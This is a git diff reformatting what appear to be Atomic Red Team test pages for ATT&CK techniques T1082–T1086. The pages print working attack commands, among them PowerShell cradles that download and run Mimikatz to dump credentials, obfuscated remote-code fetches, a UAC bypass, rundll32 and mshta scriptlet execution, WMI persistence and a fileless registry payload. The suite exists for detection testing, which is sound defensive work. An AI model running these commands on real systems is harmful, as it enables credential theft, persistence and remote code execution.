many other things without needing elevated permissions. +On Mac, the systemsetup command gives a detailed breakdown of the system, but it requires administrative +privileges. Additionally, the system_profiler gives a very detailed breakdown of configurations, firewall +rules, mounted volumes, hardware, and many other things without needing elevated permissions. 
### AWS -In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual machines, software, and software dependencies running.(Citation: Amazon System Discovery) +In Amazon Web Services (AWS), the Application Discovery Service may be used by an adversary to identify servers, virtual +machines, software, and software dependencies running.(Citation: Amazon System Discovery) ### GCP -On Google Cloud Platform (GCP) GET /v1beta1/{parent=organizations/*}/assets or POST /v1beta1/{parent=organizations/*}/assets:runDiscovery may be used to list an organizations cloud assets, or perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard) +On Google Cloud Platform (GCP) GET /v1beta1/{parent=organizations/*}/assets or POST +/v1beta1/{parent=organizations/*}/assets:runDiscovery may be used to list an organizations cloud assets, or +perform asset discovery on a cloud environment.(Citation: Google Command Center Dashboard) ### Azure -In Azure, the API request GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01 may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal Machine API)
+In Azure, the API request +GET https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachines/{vmName}?api-version=2019-03-01 +may be used to retrieve information about the model or instance view of a virtual machine.(Citation: Microsoft Virutal +Machine API) ## Atomic Tests @@ -40,45 +53,31 @@ In Azure, the API request GET https://management.azure.com/subscriptions/{ - [Atomic Test #8 - Windows MachineGUID Discovery](#atomic-test-8---windows-machineguid-discovery) -
## Atomic Test #1 - System Information Discovery + Identify System Info **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd systeminfo reg query HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum ``` - - - - -

## Atomic Test #2 - System Information Discovery + Identify System Info **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh systemsetup @@ -86,25 +85,16 @@ system_profiler ls -al /Applications ``` - - - - -

## Atomic Test #3 - List OS Information + Identify System Info **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh uname -a >> /tmp/loot.txt @@ -114,25 +104,16 @@ uptime >> /tmp/loot.txt cat /etc/issue >> /tmp/loot.txt ``` - - - - -

## Atomic Test #4 - Linux VM Check via Hardware + Identify virtual machine hardware. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash cat /sys/class/dmi/id/bios_version | grep -i amazon @@ -145,25 +126,16 @@ sudo lspci | grep -i "vmware\|virtualbox" sudo lscpu | grep -i "Xen\|KVM\|Microsoft" ``` - - - - -

## Atomic Test #5 - Linux VM Check via Kernel Modules + Identify virtual machine guest kernel modules. This technique is used by the Pupy RAT and other malware. **Supported Platforms:** Linux - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash sudo lsmod | grep -i "vboxsf\|vboxguest" @@ -173,81 +145,49 @@ sudo lsmod | grep -i "virtio_pci\|virtio_net" sudo lsmod | grep -i "hv_vmbus\|hv_blkvsc\|hv_netvsc\|hv_utils\|hv_storvsc" ``` - - - - -

## Atomic Test #6 - Hostname Discovery (Windows) + Identify system hostname for Windows. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd hostname ``` - - - - -

## Atomic Test #7 - Hostname Discovery + Identify system hostname for Linux and macOS systems. **Supported Platforms:** Linux, macOS - - - - -#### Attack Commands: Run with `bash`! - +#### Attack Commands: Run with `bash`! ```bash hostname ``` - - - - -

## Atomic Test #8 - Windows MachineGUID Discovery + Identify the Windows MachineGUID value for a system. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd REG QUERY HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography /v MachineGuid ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1083.md b/Atomic_Threat_Coverage/Triggers/T1083.md
index a7cd04eb..d703bc8c 100644
--- a/Atomic_Threat_Coverage/Triggers/T1083.md
+++ b/Atomic_Threat_Coverage/Triggers/T1083.md
@@ -1,14 +1,19 @@
 # T1083 - File and Directory Discovery
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1083)
+
Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. ### Windows -Example utilities used to obtain this information are dir and tree. (Citation: Windows Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows API. +Example utilities used to obtain this information are dir and tree. (Citation: Windows +Commands JPCERT) Custom tools may also be used to gather file and directory information and interact with the Windows +API. ### Mac and Linux -In Mac and Linux, this kind of discovery is accomplished with the ls, find, and locate commands.
+In Mac and Linux, this kind of discovery is accomplished with the ls, find, and +locate commands. ## Atomic Tests @@ -20,21 +25,17 @@ In Mac and Linux, this kind of discovery is accomplished with the ls ## Atomic Test #1 - File and Directory Discovery (cmd.exe) -Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder and contain the output of + +Find or discover files on the file system. Upon execution, the file "download" will be placed in the temporary folder +and contain the output of all of the data discovery commands. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd dir /s c:\ >> %temp%\download @@ -46,25 +47,16 @@ dir "%userprofile%\Desktop\*.*" >> %temp%\download tree /F >> %temp%\download ``` - - - - -

## Atomic Test #2 - File and Directory Discovery (PowerShell) + Find or discover files on the file system. Upon execution, file and folder information will be displayed. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell ls -recurse @@ -72,15 +64,11 @@ get-childitem -recurse gci -recurse ``` - - - - -

## Atomic Test #3 - Nix File and Diectory Discovery + Find or discover files on the file system References: @@ -91,12 +79,7 @@ https://perishablepress.com/list-files-folders-recursively-terminal/ **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh ls -a > allcontents.txt @@ -108,25 +91,16 @@ locate * which sh ``` - - - - -

## Atomic Test #4 - Nix File and Directory Discovery 2 + Find or discover files on the file system **Supported Platforms:** macOS, Linux - - - - -#### Attack Commands: Run with `sh`! - +#### Attack Commands: Run with `sh`! ```sh cd $HOME && find . -print | sed -e 's;[^/]*/;|__;g;s;__|; |;g' > /tmp/loot.txt @@ -135,9 +109,4 @@ find . -type f -iname *.pdf > /tmp/loot.txt find . -type f -name ".*" ``` - - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1084.md b/Atomic_Threat_Coverage/Triggers/T1084.md
index 9d6fd383..002fd3ef 100644
--- a/Atomic_Threat_Coverage/Triggers/T1084.md
+++ b/Atomic_Threat_Coverage/Triggers/T1084.md
@@ -1,15 +1,17 @@
 # T1084 - Windows Management Instrumentation Event Subscription
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1084)
+
Windows Management Instrumentation (WMI) can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Adversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. Adversaries may attempt to evade detection of this technique by compiling WMI scripts into Windows Management Object (MOF) files (.mof extension). (Citation: Dell WMI Persistence) Examples of events that may be subscribed to are the wall clock time or the computer's uptime. (Citation: Kazanciyan 2014) Several threat groups have reportedly used this technique to maintain persistence. (Citation: Mandiant M-Trends 2015)
## Atomic Tests - [Atomic Test #1 - Persistence via WMI Event Subscription](#atomic-test-1---persistence-via-wmi-event-subscription) -
## Atomic Test #1 - Persistence via WMI Event Subscription + Run from an administrator powershell window. After running, reboot the victim machine. After it has been online for 4 minutes you should see notepad.exe running as SYSTEM. @@ -21,12 +23,7 @@ https://github.com/EmpireProject/Empire/blob/master/data/module_source/persisten **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $FilterArgs = @{name='AtomicRedTeam-WMIPersistence-Example'; @@ -47,6 +44,7 @@ $FilterToConsumerBinding = New-CimInstance -Namespace root/subscription -ClassNa ``` #### Cleanup Commands: + ```powershell $EventConsumerToCleanup = Get-WmiObject -Namespace root/subscription -Class CommandLineEventConsumer -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" $EventFilterToCleanup = Get-WmiObject -Namespace root/subscription -Class __EventFilter -Filter "Name = 'AtomicRedTeam-WMIPersistence-Example'" @@ -56,8 +54,4 @@ $EventConsumerToCleanup | Remove-WmiObject $EventFilterToCleanup | Remove-WmiObject ``` - - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1085.md b/Atomic_Threat_Coverage/Triggers/T1085.md
index 79973256..4ea1cc28 100644
--- a/Atomic_Threat_Coverage/Triggers/T1085.md
+++ b/Atomic_Threat_Coverage/Triggers/T1085.md
@@ -1,10 +1,17 @@
 # T1085 - Rundll32
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1085)
+
The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations. -Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL) +Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll +functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes +rundll32.exe to execute. (Citation: Trend Micro CPL) -Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)
+Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to +this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.] +example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks. (Citation: This is +Security Command Line Confusion) ## Atomic Tests @@ -20,114 +27,94 @@ Rundll32 can also been used to execute scripts such as JavaScript. This can be d - [Atomic Test #6 - Rundll32 setupapi.dll Execution](#atomic-test-6---rundll32-setupapidll-execution) -
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject + Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | file_url | location of the payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1085/src/T1085.sct| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec(); ``` - - - - -

## Atomic Test #2 - Rundll32 execute VBscript command + Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | command_to_execute | Command for rundll32.exe to execute | string | calc.exe| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("#{command_to_execute}"),0) ``` - - - - -

## Atomic Test #3 - Rundll32 advpack.dll Execution + Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe advpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` - - -

## Atomic Test #4 - Rundll32 ieadvpack.dll Execution + Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched @@ -135,126 +122,115 @@ Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/ **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe ieadvpack.dll,LaunchINFSection #{inf_to_execute},DefaultInstall_SingleUser,1, ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085.inf" -OutFile "#{inf_to_execute}" ``` - - -

## Atomic Test #5 - Rundll32 syssetup.dll Execution -Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened + +Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" +will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 .\#{inf_to_execute} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` - - -

## Atomic Test #6 - Rundll32 setupapi.dll Execution -Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened + +Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" +will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | inf_to_execute | Local location of inf file | string | PathToAtomicsFolder\T1085\src\T1085_DefaultInstall.inf| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 .\#{inf_to_execute} ``` - - - #### Dependencies: Run with `powershell`! + ##### Description: Inf file must exist on disk at specified location (#{inf_to_execute}) + ##### Check Prereq Commands: + ```powershell if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1} ``` + ##### Get Prereq Commands: + ```powershell New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1085/src/T1085_DefaultInstall.inf" -OutFile "#{inf_to_execute}" ``` - - -
diff --git a/Atomic_Threat_Coverage/Triggers/T1086.md b/Atomic_Threat_Coverage/Triggers/T1086.md
index 1b033cff..46fd9e33 100644
--- a/Atomic_Threat_Coverage/Triggers/T1086.md
+++ b/Atomic_Threat_Coverage/Triggers/T1086.md
@@ -1,14 +1,22 @@
 # T1086 - PowerShell
+
 ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1086)
+
PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer. -PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. +PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in +memory without touching disk. Administrator permissions are required to use PowerShell to connect to remote systems. -A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. (Citation: Github PSAttack) +A number of PowerShell-based offensive testing tools are available, +including [Empire](https://attack.mitre.org/software/S0363), PowerSploit, (Citation: Powersploit) and PSAttack. ( +Citation: Github PSAttack) -PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: Microsoft PSfromCsharp APR 2014)
+PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces +to PowerShell's underlying System.Management.Automation assembly exposed through the .NET framework and Windows Common +Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) (Citation: +Microsoft PSfromCsharp APR 2014) ## Atomic Tests @@ -38,85 +46,66 @@ PowerShell commands/scripts can also be executed without directly invoking the p - [Atomic Test #13 - NTFS Alternate Data Stream Access](#atomic-test-13---ntfs-alternate-data-stream-access) -
## Atomic Test #1 - Mimikatz + Download Mimikatz and dump credentials. Upon execution, mimikatz dump details and password hashes will be displayed. **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | mimurl | Mimikatz url | url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1| - -#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd powershell.exe "IEX (New-Object Net.WebClient).DownloadString('#{mimurl}'); Invoke-Mimikatz -DumpCreds" ``` - - - - -

## Atomic Test #2 - BloodHound + Upon execution BloodHound will be downloaded and executed. It will set up collection methods, run, and then compress and store the data to the temp directory on the machine **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | bloodurl | BloodHound URL | url | https://raw.githubusercontent.com/BloodHoundAD/BloodHound/a7ea5363870d925bc31d3a441a361f38b0aadd0b/Ingestors/SharpHound.ps1| - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell IEX (New-Object Net.WebClient).DownloadString('#{bloodurl}'); Invoke-BloodHound ``` #### Cleanup Commands: + ```powershell Remove-Item $env:temp\*BloodHound.zip -Force ``` - - - -

## Atomic Test #3 - Obfuscation Tests + Different obfuscated methods to test Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! - +#### Attack Commands: Run with `powershell`! ```powershell (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) @@ -124,222 +113,160 @@ Reaches out to bit.ly/L3g1t to stdout: "SUCCESSFULLY EXECUTED POWERSHELL CODE FR Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) ``` - - - - -

## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys -Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. - -**Supported Platforms:** Windows - +Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and +input code, then mimikatz dump info will be displayed. +**Supported Platforms:** Windows - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1';$wshell=New-Object -ComObject WScript.Shell;$reg='HKCU:\Software\Microsoft\Notepad';$app='Notepad';$props=(Get-ItemProperty $reg);[Void][System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');@(@('iWindowPosY',([String]([System.Windows.Forms.Screen]::AllScreens)).Split('}')[0].Split('=')[5]),@('StatusBar',0))|ForEach{SP $reg (Item Variable:_).Value[0] (Variable _).Value[1]};$curpid=$wshell.Exec($app).ProcessID;While(!($title=GPS|?{(Item Variable:_).Value.id-ieq$curpid}|ForEach{(Variable _).Value.MainWindowTitle})){Start-Sleep -Milliseconds 500};While(!$wshell.AppActivate($title)){Start-Sleep -Milliseconds 500};$wshell.SendKeys('^o');Start-Sleep -Milliseconds 500;@($url,(' '*1000),'~')|ForEach{$wshell.SendKeys((Variable _).Value)};$res=$Null;While($res.Length -lt 2){[Windows.Forms.Clipboard]::Clear();@('^a','^c')|ForEach{$wshell.SendKeys((Item Variable:_).Value)};Start-Sleep -Milliseconds 500;$res=([Windows.Forms.Clipboard]::GetText())};[Windows.Forms.Clipboard]::Clear();@('%f','x')|ForEach{$wshell.SendKeys((Variable _).Value)};If(GPS|?{(Item Variable:_).Value.id-ieq$curpid}){@('{TAB}','~')|ForEach{$wshell.SendKeys((Item 
Variable:_).Value)}};@('iWindowPosDY','iWindowPosDX','iWindowPosY','iWindowPosX','StatusBar')|ForEach{SP $reg (Item Variable:_).Value $props.((Variable _).Value)};IEX($res);invoke-mimikatz -dumpcr ``` - - - - -

## Atomic Test #5 - Invoke-AppPathBypass + Note: Windows 10 only Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ Upon execution windows backup and restore window will be opened **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Misc-PowerShell-Stuff/a0dfca7056ef20295b156b8207480dc2465f94c3/Invoke-AppPathBypass.ps1'); Invoke-AppPathBypass -Payload 'C:\Windows\System32\cmd.exe'" ``` - - - - -

## Atomic Test #6 - Powershell MsXml COM object - no prompt + Provided by https://github.com/mgreen27/mgreen27.github.io Powershell MsXml COM object. Not proxy aware removing cache although does not appear to write to those locations **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd powershell.exe IEX -exec bypass -windowstyle hidden -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` - - - - -

## Atomic Test #7 - Powershell MsXml COM object - with prompt -Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. + +Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon +execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.i **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open('GET','#{url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText" ``` - - - - -

## Atomic Test #8 - Powershell XML requests + Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('#{url}');$Xml.command.a.execute | IEX" ``` - - - - -

## Atomic Test #9 - Powershell invoke mshta.exe download -Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". + +Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display " +Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io **Supported Platforms:** Windows - - - #### Inputs: + | Name | Description | Type | Default Value | |------|-------------|------|---------------| | url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct| - -#### Attack Commands: Run with `command_prompt`! - +#### Attack Commands: Run with `command_prompt`! ```cmd C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}').Exec();close()" ``` - - - - -

## Atomic Test #10 - Powershell Invoke-DownloadCradle + Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. **Supported Platforms:** Windows +#### Run it with these steps! - - -#### Run it with these steps! 1. Open Powershell_ise as a Privileged Account 2. Invoke-DownloadCradle.ps1 - - - - - -

## Atomic Test #11 - PowerShell Fileless Script Execution -Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that + +Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon +exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. **Supported Platforms:** Windows - - - - -#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) - +#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin) ```powershell # Encoded payload in next command is the following "Set-Content -path "$env:SystemRoot/Temp/art-marker.txt" -value "Hello from the Atomic Red Team"" @@ -348,70 +275,61 @@ iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Sof ``` #### Cleanup Commands: + ```powershell Remove-Item -path C:\Windows\Temp\art-marker.txt -Force -ErrorAction Ignore Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore ``` - - - -

